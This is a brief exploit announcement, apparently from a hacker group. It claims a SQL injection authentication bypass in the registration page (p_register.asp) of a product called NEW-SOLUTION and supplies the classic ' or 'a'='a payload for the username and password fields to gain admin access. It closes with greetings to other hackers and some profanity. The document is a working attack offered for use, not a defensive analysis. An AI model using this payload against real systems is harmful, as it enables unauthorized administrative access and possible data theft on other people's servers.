I MurderSkillz from g00ns.net have found a SQL Injection auth bypass in NEW-SOLUTION.
The SQL Injection takes place in p_register.asp. If injected with special characters it will grant you with Admin.
User:Pass

' or 'a'='a

Brought to u by MurerSkillz of g00ns.net
Shouts to z3r0, neX, uid0 (exploitercode.com), Zodiac, Wicked, and all the other I may have forgot..

OO cant forget the Shouts to the Mother fuckers who hate us =)